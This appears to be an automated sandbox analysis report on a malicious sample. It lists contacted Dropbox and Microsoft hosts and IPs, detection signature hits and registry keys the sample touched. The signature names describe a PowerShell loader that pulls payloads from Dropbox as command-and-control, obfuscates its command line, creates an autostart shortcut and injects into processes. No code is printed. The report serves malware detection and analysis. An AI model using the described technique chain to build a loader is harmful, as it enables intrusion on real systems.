Modulebase:	0x7ff6efc20000
Modulesize:	184320
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

http://pesterbdd.com/images/Pester.png

unknown

https://go.micro

unknown

https://api.dropboxapi.com

unknown

https://content.dropboxapi.com/2/files/download

162.125.6.14

http://go.micros

unknown

https://api.dropboxapi.com/oauth2/token

162.125.6.19

https://content.dropboxapi.com

unknown

http://nuget.org/NuGet.exe

unknown

https://aka.ms/winsvr-2022-pshelp

unknown

http://edge-block-api-env.dropbox-dns.com

unknown

http://schemas.xmlsoap.org/soap/encoding/

unknown

http://www.apache.org/licenses/LICENSE-2.0.html

unknown

http://crl.micro/pki/crl/productCerAut_2010-06-2

unknown

https://contoso.com/License

unknown

https://contoso.com/Icon

unknown

https://aka.ms/winsvr-2022-pshelpX

unknown

https://g.live.com/odclientsettings/ProdV21C:

unknown

http://crl.ver)

unknown

http://content.dropboxapi.com

unknown

http://www.microsoft.

unknown

http://api-env.dropbox-dns.com

unknown

https://github.com/Pester/Pester

unknown

https://g.live.com/odclientsettings/Prod1C:

unknown

http://www.microsoft.S

unknown

http://crl.micro

unknown

http://schemas.xmlsoap.org/wsdl/

unknown

https://contoso.com/

unknown

https://nuget.org/nuget.exe

unknown

https://aka.ms/pscore68

unknown

http://api.dropboxapi.com

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

http://www.microsoft.StorageReliabilityCounter.cdxml

unknown

There are 22 hidden URLs, click here to show them.

Domains

Name

Malicious

api.dropboxapi.com

unknown

Details

Name:	api.dropboxapi.com
TargetID:	-1

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Powershell download payload from hardcoded c2 list	Spreading
Found URL in windows shortcut file (LNK)	System Summary
Powershell creates an autostart link	Boot Survival	Registry Run Keys / Startup Folder PowerShell
Sigma detected: Invoke-Obfuscation STDIN+ Launcher	System Summary
Sigma detected: Potential PowerShell Command Line Obfuscation	System Summary
Sigma detected: Suspicious PowerShell IEX Execution Patterns	System Summary
Sigma detected: Suspicious Script Execution From Temp Folder	System Summary
Suspicious powershell command line found	Data Obfuscation	PowerShell
Windows shortcut file (LNK) contains suspicious command line arguments	System Summary
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Executes visual basic scripts	System Summary	Scripting
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Posts data to webserver	Networking	Application Layer Protocol Non-Application Layer Protocol
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

content.dropboxapi.com

unknown

Details

Name:	content.dropboxapi.com
TargetID:	-1

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Powershell download payload from hardcoded c2 list	Spreading
Found URL in windows shortcut file (LNK)	System Summary
Powershell creates an autostart link	Boot Survival	Registry Run Keys / Startup Folder PowerShell
Sigma detected: Invoke-Obfuscation STDIN+ Launcher	System Summary
Sigma detected: Potential PowerShell Command Line Obfuscation	System Summary
Sigma detected: Suspicious PowerShell IEX Execution Patterns	System Summary
Sigma detected: Suspicious Script Execution From Temp Folder	System Summary
Suspicious powershell command line found	Data Obfuscation	PowerShell
Windows shortcut file (LNK) contains suspicious command line arguments	System Summary
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
HTTP GET or POST without a user agent	Networking
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Executes visual basic scripts	System Summary	Scripting
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

api-env.dropbox-dns.com

162.125.6.19

part-0012.t-0009.t-msedge.net

13.107.246.40

Details

Name:	part-0012.t-0009.t-msedge.net
IP:	13.107.246.40
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Excel Network Connections	System Summary
Sigma detected: Suspicious Office Outbound Connections	System Summary
Uses secure TLS version for HTTPS connections	Compliance, Networking

edge-block-api-env.dropbox-dns.com

162.125.6.14

IPs

Domain

Country

Malicious

162.125.6.14

edge-block-api-env.dropbox-dns.com

United States

Details

IP:	162.125.6.14
TargetID:	3
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Country:	United States
Countrycode:	USA
ASN number:	19679
ASN name:	DROPBOXUS
Private:	false
Domain:	edge-block-api-env.dropbox-dns.com

Signature Hits	Behavior Group	Mitre Attack
Uses secure TLS version for HTTPS connections	Compliance, Networking

13.107.246.40

part-0012.t-0009.t-msedge.net

United States

Details

IP:	13.107.246.40
TargetID:	8
Current Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Country:	United States
Countrycode:	USA
ASN number:	8068
ASN name:	MICROSOFT-CORP-MSN-AS-BLOCKUS
Private:	false
Domain:	part-0012.t-0009.t-msedge.net

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Excel Network Connections	System Summary
Sigma detected: Suspicious Office Outbound Connections	System Summary
Uses secure TLS version for HTTPS connections	Compliance, Networking

162.125.6.19

api-env.dropbox-dns.com

United States

127.0.0.1

unknown

Registry

Path

Value

Malicious

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileDirectory

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

SlowContextMenuEntries

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

SlowContextMenuEntries

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\3184

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Resiliency\StartupItems

{6'

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel

ExcelWorkbookOpenedCount

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\16

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML

KnownIDs

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor\shell

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor\shell

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor\shell\Edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor\shell\Edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor

Description

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor\shell\Print

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor\shell\Print

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor\shell\Print\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor\shell\Print\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Print\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\DefaultIcon

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\ShellEx\IconHandler

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile\DefaultIcon

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word\shell

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe\shell

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher\shell

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML

KnownIDs

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Default Editor

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Old Default Editor

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Default Editor\shell

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Old Default Editor\shell

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Default Editor\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Old Default Editor\shell\Edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Default Editor\shell\Edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Old Default Editor\shell\Edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor

Description

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Print

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Print\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Default Editor\shell\Print

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Old Default Editor\shell\Print

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Default Editor\shell\Print\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Old Default Editor\shell\Print\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\DefaultIcon

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\ShellEx\IconHandler

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile\DefaultIcon

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Word

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Word\shell

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe\shell

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher\shell

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe\shell

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe\shell\edit

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command

NULL

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}

Categories

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}

Categories

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor

ULSTagIds0

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor

ULSTagIds1

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor

ULSTagIds2

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor

ULSCategoriesSeverities

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor

ULSAllCategories

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.1

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.2

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.3

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.4

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.5

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.6

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.7

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.8

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.9

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.10

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.11

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.12

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData

0.13

